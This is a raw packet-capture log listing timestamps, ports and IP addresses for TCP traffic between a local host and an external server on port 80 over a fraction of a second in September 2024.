Sep 1, 2024 18:27:46.585213900 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585223913 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585232973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585244894 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.585249901 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.585283041 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.586941004 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.586950064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.586993933 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.587188005 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587198973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587209940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587229967 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587255001 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.587276936 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.587280989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587291956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.587327957 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.593202114 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593288898 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593300104 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593434095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593449116 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.593494892 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.593516111 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593621969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593632936 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593641996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.593668938 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.593692064 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.598539114 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598582029 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598592043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598618031 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.598797083 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598808050 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598818064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598829985 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.598834991 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.598859072 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.599117994 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599163055 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.599221945 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599237919 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599267960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.599404097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599415064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599453926 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.599546909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599558115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.599591970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.605909109 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.605995893 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606007099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606044054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.606178999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606190920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606225967 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.606312037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606329918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606353998 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.606729984 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606743097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606776953 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.606894970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606905937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606914997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606925964 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.606937885 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.606956005 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.607115030 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.607156038 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.611943960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.611953974 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.611959934 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612035036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.612138987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612149954 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612160921 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612193108 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.612215042 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.612287045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612298012 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.612344027 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.632498980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632508993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632519007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632554054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.632730007 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632776976 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.632831097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632842064 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.632874966 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.633023024 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633033037 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633066893 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.633346081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633356094 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633366108 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633377075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633393049 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.633393049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633404970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633410931 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.633415937 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633450985 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.633538008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.633584023 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.652230978 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652491093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652524948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652537107 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652551889 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652554035 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.652564049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652574062 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652578115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.652585030 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.652611971 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.652635098 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.658343077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658404112 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658451080 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.658477068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658488035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658523083 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.658759117 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658771038 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658781052 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.658818960 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.662827969 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.662872076 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.662899971 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.662930965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.662975073 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.663006067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.663017035 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.663028002 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.663039923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.663050890 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.663086891 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.663276911 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667685986 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667718887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667738914 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.667772055 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667814016 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.667834997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667870045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667907953 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667912006 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.667920113 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.667953968 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.668118000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672744989 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672755003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672764063 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672794104 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.672827005 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.672930956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672943115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672954082 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672966003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.672980070 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.672991037 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673044920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673152924 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673192024 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673239946 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673249960 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673260927 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673291922 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673458099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673469067 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673480034 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673495054 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673515081 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673695087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673760891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673793077 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673803091 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673894882 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673904896 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673916101 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.673930883 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.673957109 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.674118042 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.674129009 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.674179077 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.675658941 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675721884 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675734043 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675753117 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.675890923 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675903082 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675915956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675928116 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.675930977 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.675962925 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.681915045 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.681966066 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.681974888 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.681977987 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.682010889 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.682171106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.682182074 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.682192087 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.682229042 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.682488918 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.682528019 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687169075 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687236071 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687262058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687298059 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687321901 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687361956 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687419891 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687431097 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687457085 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687628031 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687639952 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687649965 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687661886 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687669992 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687707901 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687827110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687894106 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687906027 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687916040 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.687931061 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.687946081 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.696841955 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.696877956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.696887016 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.696935892 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.697011948 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.697022915 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.697056055 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.697232008 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.697244883 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.697253942 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.697276115 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.697304964 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.700680017 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700783014 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700794935 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700826883 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.700911999 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700927973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700938940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700949907 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.700963020 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.700974941 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.701384068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701426983 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.701524973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701535940 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701550961 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701561928 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701566935 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.701572895 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701582909 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.701591015 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.701627970 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.721112013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721124887 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721136093 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721177101 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.721257925 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721268892 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721278906 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721291065 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.721299887 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.721321106 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.740879059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740890980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740900993 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740946054 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740948915 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.740956068 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740966082 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740977049 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.740992069 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741019011 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741029978 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741261959 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741364956 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741377115 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741405010 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741568089 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741578102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741601944 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741688013 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741698980 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741728067 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.741861105 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741868973 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.741898060 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.747503996 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747605085 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747615099 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747623920 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747659922 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747663975 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.747672081 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747682095 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747690916 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.747709036 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.747730017 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759196997 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759242058 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759242058 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759253025 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759287119 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759480000 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759588003 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759598970 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759609938 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759618998 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759624004 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759637117 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759875059 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759922028 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.759948015 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759958982 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.759993076 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.760193110 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.760202885 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.760236979 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.760363102 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.760374069 CEST	80	56160	94.228.169.44	192.168.2.4
Sep 1, 2024 18:27:46.760416985 CEST	56160	80	192.168.2.4	94.228.169.44
Sep 1, 2024 18:27:46.761852026 CEST	80	56160	94.228.169.44	192.168.2.4
